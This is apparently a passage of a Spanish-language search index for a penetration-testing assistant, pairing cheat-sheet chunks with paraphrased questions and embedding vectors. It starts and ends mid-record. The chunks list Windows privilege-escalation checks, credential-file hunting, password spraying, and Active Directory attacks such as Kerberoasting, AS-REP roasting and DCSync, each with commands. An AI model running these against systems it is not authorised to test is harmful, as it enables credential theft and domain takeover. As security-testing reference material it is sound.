-0.003, 0.02534, -0.09343, 0.01939, -0.02828, -0.03724, -0.00969, -0.02465, -0.0126, -0.01062, -0.0638, 0.03188, -0.07465, -0.04909, 0.1185, -0.02041, 0.07034, -0.01006, -0.01958, 0.02927, -0.05494, -0.02501, -0.01576, 0.03407, 0.01964, -0.00255, -0.00847, 0.01453, 0.03497, 0.11118, -0.0183, 0.06394, -0.03811, -0.00362, 0.02222, 0.02928, 0.00644, -0.0485, 0.03073, 0.0362, 0.00059, 0.06254, 0.02049, 0.04659, -0.01531, -0.00604, -0.01739, 0.01057, 0.06594, 0.00256, -0.0472, -0.05703, -0.03326, -0.04114, 0.04291, -0.00221, -0.04135, 0.03089, -0.03137, 0.00452, -0.03611, -0.05961, -0.03413]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Windows β€” los 10 olvidados", "indexar": "quΓ© programa hay para auditar la seguridad de un sistema Windows?", "v": [-0.03336, 0.02554, 0.00745, -0.24415, 0.02979, -0.12599, -0.10863, -0.13293, -0.03149, 0.00839, -0.09959, -0.11433, -0.06948, 0.02613, -0.03615, -0.06083, 0.02077, -0.11718, 0.01787, 0.01857, 0.03142, -0.0497, 0.0029, -0.00268, -0.13132, 0.10235, 0.03411, -0.03631, -0.02089, 0.02392, 0.00302, 0.01634, 0.04324, -0.03593, -0.15511, 0.04854, 0.09219, 0.07529, 0.09729, 0.10876, 0.04305, 0.00352, 0.0831, 0.0906, 0.17428, -0.0648, 0.10587, -0.01057, 0.12481, -0.09938, -0.11654, 0.00675, -0.01191, -0.04235, 0.13855, -0.09355, -0.09202, -0.0564, -0.00578, -0.05669, -0.13019, 0.07081, 0.0062, -0.00183, 0.00425, 0.02476, 0.07398, -0.03801, 0.00188, 0.10358, -0.01017, -0.06371, 0.06794, 0.09116, -0.03501, -0.05648, -0.01914, -0.05238, 0.03712, -0.01897, 0.00834, 0.06162, 0.01491, 0.04903, -0.0593, -0.09548, -0.04954, 0.0229, -0.08451, -0.01396, 0.04466, -0.01054, 0.01106, 0.06362, 0.0238, -0.05633, 0.10273, -0.01324, -0.08999, 0.01557, -0.02357, -0.14435, -0.05672, 0.10237, -0.04844, 0.08796, 0.00518, 0.0192, -0.0115, -0.03766, -0.02909, 0.03928, -0.10009, -0.07052, -0.11146, 0.01191, 0.02769, -0.04093, 0.04043, 0.01741, -0.06774, 0.08736, -0.1069, -0.00667, 0.08682, -0.07611, 0.0287, 0.12239, -0.05543, 0.0565, 0.10468, -0.04318, -0.11652, -0.03051, -0.07651, -0.03056, -0.05713, -0.01691, -0.00085, -0.02468, 0.01645, 0.09291, 0.09209, 0.01822, 0.00016, 0.04554, 0.06326, 0.01003, -0.06019, -0.00947, -0.01575, 0.01557, -0.10262, -0.0638, -0.0821, 0.0005, 0.03525, 0.03476, -0.0019, -0.01226, 0.00668, -0.02959, 0.04947, -0.02976, 0.07174, 0.00794, 0.01958, -0.01477, 0.06098, -0.02075, -0.00812, 0.07445, 0.05564, -0.05942, 0.03723, -0.00545, 0.00188, -0.13022, 0.01799, -0.04761, -0.12389, 0.04182, 0.06563, -0.02022, 0.02526, -0.01661, -0.03405, 0.07815, 0.00899, 0.03552, 0.00517, -0.00697, 0.01832, -0.02186, -0.02074, -0.00047, -0.02252, -0.08864, -0.0092, 0.03875, -0.0613, 0.00118, 0.01808, -0.06247, 0.12941, 0.09128, 0.05058, 0.0224, 0.10788, 0.09628, 0.05197, 0.02434, 0.01029, -0.02778, -0.04206, -0.00532, 0.02304, 0.08536, -0.00736, 0.01433, 0.02941, -0.02488, 0.03681, 0.0466, -0.04244, -0.0788, -0.05009, 0.04326, 0.01452, -0.01353, 0.00554, -0.0994, -0.02043, 0.00781, -0.00614, -0.052, -0.03187, -0.02011, 0.03075, -0.09938, -0.05833, 0.08855, -0.017, -0.10274, -0.07555, -0.00799, -0.02872, 0.00351, 0.0062, -0.05529, -0.01101, 0.02814, 0.00974, -0.04872, -0.0106, 0.02529]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Windows β€” los 10 olvidados", "indexar": "con quΓ© puedo escanear vulnerabilidades en mi ordenador Windows?", "v": [0.00851, 0.04229, -0.04852, -0.09578, -0.01329, -0.03926, -0.09825, -0.0808, -0.02326, -0.08674, 0.0104, -0.07676, -0.09629, -0.04036, -0.02831, 0.01531, 0.04093, -0.06718, 0.08076, 0.07004, 0.01136, -0.08211, -0.04795, 0.02039, -0.0193, 0.07389, -0.0849, 0.07736, -0.04359, -0.06435, -0.05553, 0.05145, 0.04428, -0.02884, -0.05608, 0.08059, -0.01852, 0.04324, 0.16434, 0.02817, 0.11946, 0.09175, -0.02867, 0.04993, 0.17883, -0.09646, -0.00721, -0.08412, 0.07949, 0.01092, -0.11063, -0.09751, -0.0838, -0.0442, 0.04072, -0.07499, 0.14295, -0.04095, 0.13079, 0.00205, -0.1011, 0.20491, 0.01855, 0.03764, -0.00038, 0.03832, 0.00656, 0.034, -0.04234, 0.17458, -0.09983, 0.02892, 0.02315, -0.07906, -0.00161, 0.00544, -0.05093, -0.05085, 0.13207, 0.05065, 0.07262, 0.06969, -0.00188, -0.03758, -0.08156, -0.10684, 0.02246, -0.0366, 0.08052, -0.10058, 0.12997, -0.0019, -0.12134, 0.07366, 0.03389, -0.03344, 0.09596, 0.04421, -0.10173, 0.03296, -0.06792, -0.07068, -0.06203, 0.16244, -0.05546, 0.09593, -0.01911, -0.04993, -0.02524, -0.08271, 0.03173, 0.05215, -0.08438, -0.04777, -0.10808, 0.03574, 0.03102, -0.03692, 0.00322, 0.04813, -0.03708, -0.03868, -0.02558, 0.03034, -0.0184, -0.02095, 0.02442, 0.08792, -0.09951, -0.04258, 0.01707, -0.05331, -0.01485, -0.0326, -0.04836, 0.06794, -0.01322, -0.12061, 0.01988, -0.06401, 0.08787, 0.07336, 0.02456, 0.02998, -0.04954, 0.09278, 0.08426, 0.01552, -0.08955, -0.07834, 0.0843, -0.02415, -0.04765, 0.02129, -0.02792, 0.05816, 0.01273, 0.11409, -0.00394, 0.0234, -0.024, 0.09998, 0.00827, 0.02298, -0.00601, -0.01225, 0.00779, 0.02207, 0.03572, 0.01196, -0.08636, 0.10627, -0.00515, -0.07066, 0.0657, -0.01684, 0.0461, 0.00082, -0.05816, -0.01023, -0.05817, 0.06718, 0.02862, 0.01719, -0.02347, 0.03149, -0.0367, 0.03267, -0.02649, 0.00755, -0.05934, -0.02532, 0.05553, -0.03004, 0.0495, -0.02084, -0.07097, -0.0059, 0.02795, -0.01913, -0.09342, 0.00194, -0.07863, -0.0316, 0.13459, 0.08041, -0.03061, -0.04317, 0.04897, 0.07995, -0.03616, 0.00047, 0.01687, -0.04181, -0.0309, -0.081, 0.05835, 0.03026, -0.00124, -0.06026, 0.03691, -0.01373, 0.07115, 0.02579, -0.0034, -0.04854, -0.08293, -0.04953, 0.00357, -0.00934, 0.03164, -0.01889, -0.03378, -0.0118, -0.0139, -0.02238, -0.00085, -0.02505, -0.02091, 0.04687, -0.02134, 0.04677, 0.00781, -0.12858, -0.05287, -0.01999, -0.04054, -0.00567, -0.06005, -0.05563, -0.03816, -0.01888, -0.01516, -0.08434, -0.04013, 0.0393]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Privesc Windows β€” los 10 olvidados", "indexar": "quΓ© herramienta sirve para evaluar las amenazas en una PC Windows?", "v": [-0.0182, 0.1093, -0.06741, -0.18228, 0.05555, -0.16211, -0.01194, -0.07635, 0.06477, -0.15709, 0.053, -0.01665, -0.06447, -0.07795, -0.0213, 0.05327, 0.0281, -0.03982, 0.06556, 0.02897, 0.0002, -0.05694, -0.09228, 0.01456, -0.07566, 0.12555, -0.00227, 0.02038, -0.15557, 0.0238, -0.02538, 0.04148, 0.03768, -0.09721, -0.08025, 0.04309, -0.03628, 0.06635, 0.04574, 0.11527, 0.02881, 0.12777, -0.00862, 0.04103, 0.13234, -0.07546, 0.00932, -0.00225, 0.12144, 0.02457, -0.09193, -0.09147, -0.05893, -0.02322, 0.06629, -0.08482, 0.1349, -0.06387, 0.04944, -0.13541, -0.12668, 0.13784, -0.04126, -0.02426, -0.06882, 0.0557, -0.02074, -0.00813, -0.00577, 0.08563, -0.06476, -0.04563, 0.11004, -0.03289, -0.01043, 0.00922, -0.03458, -0.00973, 0.13308, -0.06694, 0.11244, 0.04682, -0.09685, 0.02699, -0.09028, -0.14967, 0.02777, -0.06083, 0.03111, -0.13163, 0.04995, 0.00649, -0.07549, 0.07593, 0.04333, -0.04343, 0.07593, -0.0553, 0.00353, 0.04328, 0.09697, -0.16549, -0.05321, 0.03583, -0.1254, 0.04917, -0.08946, -0.05709, -0.06832, 0.01087, 0.02937, 0.06677, -0.02862, 0.01489, -0.06073, 0.04039, -0.00318, -0.13045, 0.01108, -0.03644, -0.02227, 0.06494, -0.07432, 0.02325, -0.00838, -0.0446, -0.02867, 0.06211, -0.06948, -0.03155, 0.04276, -0.05308, -0.09578, -0.01843, -0.02326, -0.01783, 0.05736, -0.15688, -0.02207, -0.0933, 0.08109, 0.134, 0.01998, -0.01957, -0.0007, 0.07554, 0.02189, 0.0275, -0.05813, -0.00809, 0.09437, -0.04311, -0.0544, 0.02723, -0.05103, 0.01517, -0.05631, 0.09683, -0.0347, 0.05209, 0.01374, -0.01621, 0.04975, -0.03897, 0.02448, -0.02535, 0.04258, 0.01848, 0.06512, -0.00617, 0.02168, 0.05442, 0.07577, -0.05581, 0.02577, -0.00823, -0.00313, 0.04071, -0.04272, -0.01478, -0.11038, 0.03606, -0.04478, -0.00926, -0.00607, -0.01622, 0.01557, 0.01717, -0.04339, 0.05305, -0.07383, 0.0027, 0.02688, -0.08533, 0.02567, -0.01826, -0.02143, -0.06941, 0.05156, 0.01916, -0.07805, -0.04588, -0.0525, -0.01891, 0.07558, 0.10532, -0.03542, 0.00973, 0.02391, 0.06405, 0.03226, 0.01793, 0.03944, -0.03441, 0.0051, -0.01023, 0.05044, 0.03197, -0.01532, 0.013, 0.01857, 0.01615, 0.04337, -0.03027, -0.01799, -0.01143, -0.06306, -0.0184, 0.0381, -0.00608, 0.04949, -0.00532, -0.01631, -0.00104, 0.02618, -0.05058, 0.03864, -0.06703, -0.03171, -0.03721, -0.04106, 0.04564, -0.01894, -0.06363, -0.05867, -0.07313, -0.02215, -0.00498, -0.04586, -0.11318, -0.0004, -0.02696, 0.03651, -0.01873, -0.01832, -0.00121]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n1. whoami /priv β†’ busca SeImpersonate, SeAssignPrimaryToken\n β†’ JuicyPotato, PrintSpoofer, GodPotato\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n Path con espacios sin comillas + carpeta\n escribible = exe propio\n3. AlwaysInstallElev β†’ reg query HKLM\\Software\\Policies\\Microsoft\\\n Windows\\Installer\n Si ambos = 1 β†’ msi propio = SYSTEM\n4. Service permisos β†’ accesschk.exe -uwcqv user *\n SERVICE_CHANGE_CONFIG = ownership\n5. Credenciales en discoβ†’ recurse find:\n Unattend.xml, sysprep.inf, web.config,\n cmdkey /list, registry SAM/SYSTEM\n6. AutoLogon en regisβ†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\\n CurrentVersion\\Winlogon\n7. Pass spraying β†’ la misma pass del user normal contra\n admin, administrator, sa, sysadmin\n8. WSL / OpenSSH server β†’ veces hay credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v\n Tareas con scripts editables\n10. UAC bypass + token impersonation\n```\n\n---", "indexar": "con quΓ© puedo buscar si un programa tiene permisos para instalar elevados sin que el usuario se dΓ© cuenta?", "v": [0.0391, 0.19737, -0.19554, -0.07237, 0.08816, -0.10638, -0.05736, -0.12655, -0.12701, -0.17379, -0.06688, -0.04046, -0.00062, -0.1022, 0.02984, -0.05726, 0.08732, -0.00335, 0.05947, 0.0465, 0.04341, -0.08121, 0.01534, -0.04822, -0.0561, 0.02437, 0.07365, -0.07693, -0.14886, -0.07127, 0.04758, 0.01385, 0.02865, -0.07035, 0.03432, -0.03218, 0.00861, 0.02695, 0.02894, -0.01258, 0.05404, 0.04495, -0.07092, 0.06608, -0.00512, -0.04593, -0.03689, -0.05648, -0.01364, -0.06846, -0.0343, -0.00329, -0.05545, -0.05876, 0.04819, -0.076, 0.14363, -0.09729, 0.04909, 0.01725, -0.08219, 0.03065, 0.07388, 0.13057, 0.01517, 0.02013, 0.07417, 0.06531, -0.04324, 0.02961, -0.04484, -0.01426, -0.02123, -0.03044, 0.065, 0.08093, -0.09976, -0.0563, 0.06726, -0.06075, 0.0099, -0.03637, -0.03471, -0.02196, -0.13214, -0.1422, 0.03521, -0.03557, 0.00546, -0.05982, 0.02964, 0.0465, 0.00197, 0.03775, 0.05523, -0.08242, 0.10128, 0.05803, -0.04935, 0.08175, 0.01341, 0.00243, -0.02346, 0.16492, -0.04681, 0.01339, 0.12617, -0.11385, -0.03269, -0.00883, 0.03723, -0.01098, -0.0461, -0.06553, -0.07714, 0.04285, -0.08469, -0.10357, -0.06905, -0.02192, -0.08269, -0.00286, -0.01852, 0.03995, 0.08914, -0.04042, -0.03286, 0.16719, -0.01001, 0.05571, 0.00232, -0.04507, 0.03342, -0.0092, -0.09808, -0.04157, -0.03316, -0.02494, -0.07116, -0.02907, 0.02441, 0.06726, 0.01659, -0.04378, 0.06071, 0.03868, -0.06173, -0.01789, -0.04901, -0.07889, 0.02625, 0.0122, -0.00907, 0.12605, -0.05894, 0.03844, 0.01886, -0.09834, 0.01558, 0.056, -0.0209, 0.0063, -0.04546, -0.01468, 0.04292, -0.01809, -0.04668, -0.05377, 0.09337, 0.06077, -0.07234, 0.05898, 0.02342, -0.12312, 0.03884, -0.0588, -0.00422, -0.09154, 0.02664, -0.02951, -0.11559, 0.04198, 0.01848, -0.04149, -0.05131, -0.08726, -0.05107, -0.01157, 0.0509, 0.03091, -0.00444, 0.06167, -0.05064, -5e-05, 0.00414, -0.04322, -0.00441, -0.00173, -0.00272, -0.07608, -0.05753, 0.01324, -0.04248, -0.02787, 0.07127, 0.0057, -0.05531, 0.05977, 0.0304, 0.07174, 0.06045, -0.08044, 0.05601, -0.05882, -0.0603, -0.0476, 0.01523, 3e-05, 0.03762, 0.03348, 0.05449, 0.02017, 0.08425, 0.05771, 0.00689, -0.07281, 0.05995, 0.0111, 0.02509, 0.07971, -0.05179, 0.04477, -0.05112, -0.05136, 0.07586, 0.03395, 0.04618, -0.00643, -0.03077, -0.03286, 0.00183, 0.10424, 0.00948, -0.06216, -0.02573, -0.02298, -0.05562, 0.01457, -0.01276, -0.07987, -0.01597, 0.08654, 0.08232, -0.06314, 0.08487, -0.01951]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n1. whoami /priv β†’ busca SeImpersonate, SeAssignPrimaryToken\n β†’ JuicyPotato, PrintSpoofer, GodPotato\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n Path con espacios sin comillas + carpeta\n escribible = exe propio\n3. AlwaysInstallElev β†’ reg query HKLM\\Software\\Policies\\Microsoft\\\n Windows\\Installer\n Si ambos = 1 β†’ msi propio = SYSTEM\n4. Service permisos β†’ accesschk.exe -uwcqv user *\n SERVICE_CHANGE_CONFIG = ownership\n5. Credenciales en discoβ†’ recurse find:\n Unattend.xml, sysprep.inf, web.config,\n cmdkey /list, registry SAM/SYSTEM\n6. AutoLogon en regisβ†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\\n CurrentVersion\\Winlogon\n7. Pass spraying β†’ la misma pass del user normal contra\n admin, administrator, sa, sysadmin\n8. WSL / OpenSSH server β†’ veces hay credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v\n Tareas con scripts editables\n10. UAC bypass + token impersonation\n```\n\n---", "indexar": "cΓ³mo verifico si hay servicios en mi sistema que no estΓ‘n escritos con sus nombres completos o rutas exactas?", "v": [0.20589, 0.17148, -0.11988, 0.00768, 0.14389, -0.1135, 0.01859, -0.12429, -0.04352, -0.15568, -0.10284, -0.1174, 0.04619, -0.04272, 0.19607, -0.09487, 0.10935, -0.07328, 0.07065, 0.00874, -0.0567, -0.18344, -0.1076, 0.00774, -0.18837, -0.10532, 0.09345, -0.04959, -0.03399, 0.10899, 0.0799, 0.04341, -0.00183, -0.09634, -0.04678, 0.07495, 0.09713, 0.01274, -0.0295, 0.07249, -0.01528, -0.01624, 0.02085, 0.04276, 0.05672, -0.11693, -0.05397, -0.00486, -0.02155, -0.15669, -0.00682, -0.06541, -0.17839, -0.0298, -0.09562, -0.10448, 0.04356, 0.046, -0.00156, 0.06283, -0.00803, 0.08909, 0.11032, 0.0915, 0.09198, -0.03456, 0.01278, -0.08329, 0.03716, 0.00606, 0.0033, 0.02844, 0.01229, 0.03835, -0.03436, -0.01666, 0.04866, 0.00243, -0.00046, 0.05546, 0.03625, -0.02478, -0.14215, 0.03213, -0.02943, 0.01424, -0.06664, -0.0545, -0.05441, -0.01861, 0.06254, -0.01848, -0.03286, 0.06736, -0.03646, 0.1152, 0.03788, -0.00106, -0.03721, -0.02966, 0.02726, 0.04937, -0.0018, 0.07934, -0.1169, 0.00085, -0.03245, -0.00382, 0.01598, -0.04198, 0.04555, 0.02112, -0.02443, -0.02483, -0.0177, -0.00107, -0.01652, -0.05473, 0.01508, -0.04831, -0.12309, 0.0007, 0.00064, -0.03542, 0.09121, 0.00031, -0.03354, 0.03358, 0.07987, 0.03987, 0.02227, 0.00361, -0.09571, -0.09486, 0.01346, 0.00211, -0.00382, 0.02504, 0.04266, -0.03742, -0.0342, 0.10316, -0.00141, -0.03588, 0.02732, 0.08008, 0.01445, -0.0557, -0.06981, -0.01077, -0.06144, 0.09381, -0.0783, 0.10174, -0.03934, -0.01937, 0.03767, -0.06963, -0.01981, 0.01935, 0.03024, -0.00724, -0.00011, 0.00436, 0.03569, -0.00389, 0.00604, -0.04441, 0.01972, -0.0522, -0.0536, 0.03328, 0.00657, -0.0416, 0.00936, 0.02204, -0.01873, -0.01292, 0.0371, 0.01406, -0.1449, 0.04044, -0.04742, 0.02119, -0.03582, 0.00113, 0.03312, -0.00943, 0.05114, 0.02826, 0.03523, 0.00982, -0.01813, 0.0464, -0.03748, 0.02947, -0.01097, 0.00561, 0.02996, -0.05048, -0.06514, -0.01097, -0.0461, 0.01705, -0.03817, 0.03684, 0.01366, 0.00097, 0.00018, 0.06048, 0.06203, -0.02914, 0.05571, 0.00216, -0.10749, -0.03695, 0.00332, -0.03431, 0.01768, 0.00419, -0.01575, 0.00423, 0.0354, -0.00945, 0.04519, 0.00616, 0.06323, -0.00794, -0.00034, 0.03479, 0.01868, -4e-05, -0.08477, -0.02574, -0.00229, -0.02214, 0.0262, -0.02663, -0.03955, -0.07364, 0.03694, 0.11864, 0.04985, -0.05867, -0.06648, -0.04017, -0.06898, -0.03938, -0.00815, -0.07941, -0.03582, 0.0573, 0.02315, -0.06696, 0.10161, -0.09533]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "```\n1. whoami /priv β†’ busca SeImpersonate, SeAssignPrimaryToken\n β†’ JuicyPotato, PrintSpoofer, GodPotato\n2. Unquoted services β†’ wmic service get name,pathname,startmode\n Path con espacios sin comillas + carpeta\n escribible = exe propio\n3. AlwaysInstallElev β†’ reg query HKLM\\Software\\Policies\\Microsoft\\\n Windows\\Installer\n Si ambos = 1 β†’ msi propio = SYSTEM\n4. Service permisos β†’ accesschk.exe -uwcqv user *\n SERVICE_CHANGE_CONFIG = ownership\n5. Credenciales en discoβ†’ recurse find:\n Unattend.xml, sysprep.inf, web.config,\n cmdkey /list, registry SAM/SYSTEM\n6. AutoLogon en regisβ†’ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\\n CurrentVersion\\Winlogon\n7. Pass spraying β†’ la misma pass del user normal contra\n admin, administrator, sa, sysadmin\n8. WSL / OpenSSH server β†’ veces hay credenciales en .bash_history\n9. Scheduled tasks β†’ schtasks /query /fo LIST /v\n Tareas con scripts editables\n10. UAC bypass + token impersonation\n```\n\n---", "indexar": "quΓ© herramienta me ayuda a encontrar si alguna tarea programada contiene scripts modificables?", "v": [0.07007, 0.21127, -0.14994, -0.15321, 0.04916, -0.13377, -0.08523, -0.01447, -0.01424, -0.10247, -0.20264, -0.01123, 0.09637, -0.11575, 0.08494, 0.04023, 0.04387, -0.13784, 0.09389, -0.01035, 0.03295, 0.00616, -0.10354, -0.02586, -0.14619, -0.11786, 0.05157, -0.02337, -0.19417, 0.03281, 0.00206, 0.0235, 0.0472, -0.06719, -0.14712, 0.07464, -0.01634, -0.02101, -0.00031, 0.08967, -0.04596, 0.03885, -0.05589, 0.04692, -0.02299, -0.01466, 0.04526, 0.03594, -0.05798, -0.01447, -0.01094, -0.09605, -0.09038, -0.03721, 0.01058, -0.10415, 0.1924, -0.20166, -0.0576, -0.04625, -0.11242, 0.01439, -0.02522, -0.03177, 0.05516, 0.04413, 0.10027, -0.1223, -0.06099, 0.05515, -0.05163, 0.00387, 0.00477, -0.07275, -0.00953, -0.00509, -0.00582, -0.025, 0.04264, -0.02814, 0.00727, -0.0332, -0.04313, 0.0261, -0.00645, -0.1486, -0.02609, -0.01654, -0.03441, -0.11509, 0.05587, -0.00222, -0.02918, 0.04482, 0.00554, -0.01402, 0.04464, 0.00737, 0.03577, 0.05159, 0.05809, -0.12934, -0.05246, 0.10163, -0.0173, 0.09337, -0.02289, 0.01192, -0.06256, 0.00254, 0.0894, 0.06948, 0.02838, -0.00338, -0.02946, 0.05409, 0.01648, -0.00269, 0.01383, -0.13852, -0.01864, 0.10084, -0.0776, 0.0331, 0.00764, -0.00713, 0.00295, 0.06541, -0.00737, -0.05331, -0.06236, -0.06248, -0.09628, -0.10422, -0.0577, 0.02049, 0.04319, -0.04298, -0.04607, -0.04115, 0.0358, 0.01282, 0.06956, -0.00228, 0.02406, -0.00287, 0.01883, -0.04246, 0.0088, -0.00697, 0.04173, 0.01656, 0.08893, 0.02609, 0.01131, -0.0485, -0.00231, 0.02932, -0.12746, -0.02796, -0.04382, -0.05989, -0.00245, -0.06337, 0.03093, -0.07309, 0.00145, 0.06215, 0.03656, 0.0952, -0.0292, -0.0182, 0.10342, -0.0498, -0.03415, -0.12324, -0.01305, -0.01155, -0.04386, -0.08435, -0.02024, 0.00607, 0.05653, 0.00096, -0.00491, -0.07724, 0.03217, -0.0568, -0.02099, 0.00489, 0.01992, 0.02648, -0.00911, -0.10275, -0.01849, 0.00044, -0.0424, -0.045, 0.04673, 0.00742, -0.06896, -0.01951, 0.03078, -0.04915, 0.06883, 0.07689, -0.02842, -0.02085, -0.02391, 0.02867, 0.05959, -0.01309, 0.01698, 0.01949, -0.01434, -0.04612, -0.01031, 0.04116, -0.00695, -0.01159, 0.02603, -0.0523, 0.06052, -0.06348, -0.00529, -0.00129, 0.06759, 0.05347, -0.01428, 0.06758, 0.03186, -0.08673, -0.02147, -0.02124, 0.03062, -0.07206, 0.03204, -0.01945, -0.01788, -0.04127, -0.02768, 0.03757, 7e-05, -0.04613, -0.00813, -0.03364, 0.00302, -0.04264, -0.01075, -0.02466, -0.00442, -0.001, 0.07228, -0.08717, 0.011, -0.01271]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Active Directory β€” los 7 caminos que SIEMPRE pruebas\n\n```\n1. Anonymous SMB β†’ smbclient -L //IP -N\n nxc smb IP -u \"\" -p \"\"\n2. AS-REP Roasting β†’ impacket-GetNPUsers dominio/ -usersfile users.txt -no-pass\n (usuarios con \"Do not require pre-auth\")\n3. Kerberoasting β†’ impacket-GetUserSPNs dominio/user:pass -request\n (cuentas de servicio con SPN)\n4. GPP cpassword β†’ buscar en \\\\DC\\SYSVOL\\\\Policies\\\n Groups.xml con cpassword (rotos en clave AES fija)\n5. LAPS β†’ nxc ldap IP -u u -p p --module laps\n6. ACL abuses β†’ BloodHound te los pinta:\n GenericAll, WriteDACL, AddMember, ForceChangePassword\n7. DCSync β†’ con permisos DS-Replication, dumpear todo el dominio\n```\n\n---", "indexar": "que herramienta me sirve para robar contraseΓ±as de usuarios sin autenticaciΓ³n", "v": [0.14039, -0.0169, -0.12598, -0.19603, 0.01558, -0.08797, -0.03539, -0.04424, -0.00865, -0.00417, -0.03128, -0.15415, 0.13302, -0.06412, 0.09126, 0.00757, 0.0085, 0.04505, 0.03962, 0.10774, 0.04406, -0.00329, -0.0114, -0.02536, -0.02295, -0.0492, 0.03038, -0.02584, -0.12365, 0.08892, 0.02411, -0.0377, 0.05959, 0.00069, -0.09132, 0.03232, 0.03689, 0.02133, -0.00795, 0.13276, 0.16102, 0.07287, -0.13245, 0.05001, 0.05088, 0.05979, -0.0218, -0.00145, 0.08943, 0.14857, -0.06243, -0.16659, -0.1306, -0.05819, -0.10348, -0.13247, 0.18366, -0.0052, 0.08197, -0.10328, -0.17432, 0.03772, -0.04385, 0.04575, -0.00507, -0.06632, 0.10062, -0.01591, -0.03672, 0.12085, -0.0119, 0.06925, -0.03763, 0.03822, 0.02032, -0.03675, 0.02236, -0.02614, 0.01231, 0.07604, -0.01276, 0.00751, -0.01195, -0.0226, -0.08199, -0.01053, 0.15447, -0.01785, 0.08827, -0.05857, 0.04321, 0.07746, -0.00393, -0.01925, 0.00059, -0.06925, 0.05931, -0.06343, -0.07891, -0.03424, 0.09441, -0.04575, -0.05184, 0.11421, -0.04231, 0.00391, -0.06059, -0.00733, -0.01293, -0.07924, 0.01873, -0.04257, -0.01129, 0.01847, 0.03197, 0.073, -0.01996, -0.10097, -0.02814, -0.06296, 0.03347, -0.08112, -0.01641, -0.06387, 0.05198, 0.05343, 0.04294, 0.06703, -0.04936, -0.149, 0.02047, -0.04198, -0.03768, 0.07101, -0.013, -0.012, 0.01396, -0.19947, -0.09318, 0.01936, -0.03123, 0.03184, -0.05245, -0.01655, 0.03246, 0.05123, 0.04365, -0.03261, -0.04637, -0.04262, -0.02306, -0.05425, -0.0575, 0.01943, -0.02703, 0.04715, -0.05797, -0.06614, -0.1589, 0.0591, -0.02407, -0.06121, 0.01072, -0.01637, -0.10301, -0.07409, 0.06502, 0.07642, 0.06769, 0.02144, 0.09193, 0.04255, 0.09098, -0.04954, 0.00996, -0.01822, -6e-05, -0.02451, -0.01299, -0.09138, -0.04994, -0.03006, 0.01311, -0.01282, 0.00768, -0.03211, 0.06001, 3e-05, -0.03577, -0.00913, 0.00797, -0.01422, -0.02224, 0.02945, 0.03245, 0.0039, -2e-05, -0.01891, 0.01974, -0.02282, 0.00679, 0.00454, -0.03507, -0.01922, 0.07712, 0.02507, -0.01043, -0.09268, -0.02448, -0.00456, 0.04587, 0.03683, -0.01271, -0.06265, -0.01553, -0.05908, -0.00639, 0.05735, -0.05768, -0.04915, -0.00935, -0.0103, 0.03525, 0.05508, 0.00567, 0.04913, -0.06906, -0.03285, -0.02147, -0.055, 0.03739, -0.02146, -0.07347, 0.00573, 0.03578, -0.07571, -0.02646, -0.02322, 0.00447, -0.05339, -0.08314, 0.04329, 0.01086, -0.06175, -0.06137, 0.0194, 0.00675, -0.02282, -0.02158, -0.01841, -0.02011, 0.00958, 0.02494, 0.01089, -0.00873, -0.03577]} +{"tipo": "pregunta", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "fichero": "conocimiento/trucos_trampas.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Active Directory β€” los 7 caminos que SIEMPRE pruebas\n\n```\n1. Anonymous SMB β†’ smbclient -L //IP -N\n nxc smb IP -u \"\" -p \"\"\n2. AS-REP Roasting β†’ impacket-GetNPUsers dominio/ -usersfile users.txt -no-pass\n (usuarios con \"Do not require pre-auth\")\n3. Kerberoasting β†’ impacket-GetUserSPNs dominio/user:pass -request\n (cuentas de servicio con SPN)\n4. GPP cpassword β†’ buscar en \\\\DC\\SYSVOL\\\\Policies\\\n Groups.xml con cpassword (rotos en clave AES fija)\n5. LAPS β†’ nxc ldap IP -u u -p p --module laps\n6. ACL abuses β†’ BloodHound te los pinta:\n GenericAll, WriteDACL, AddMember, ForceChangePassword\n7. DCSync β†’ con permisos DS-Replication, dumpear todo el dominio\n```\n\n---", "indexar": "cΓ³mo puedo obtener las contraseΓ±as de cuentas de servicio usando SPNs", "v": [0.1394, 0.08491, -0.11652, -0.12485, 0.05838, -0.19958, 0.00567, -0.25354, -0.15752, 0.03359, -0.18708, 0.00965, -0.02149, -0.12767, -0.12709, 0.02099, 0.08523, 0.0014, 0.07848, 0.11932, -0.02237, -0.08905, -0.07275, -0.00721, -0.04208, 0.03426, 0.14354, -0.03048, -0.08999, 0.04537, 0.01233, -0.076, 0.01945, 0.04699, -0.02403, 0.05485, -0.0286, 0.19455, 0.1028, 0.06055, 0.09713, 0.0403, -0.0761, 0.05524, 0.03678, -0.03182, -0.02543, 0.05245, 0.00427, 0.00245, -0.04064, -0.0421, -0.20754, -0.03236, -0.14037, -0.05268, 0.07631, -0.01542, -0.06094, 0.02993, -0.04096, -0.0142, 0.0692, 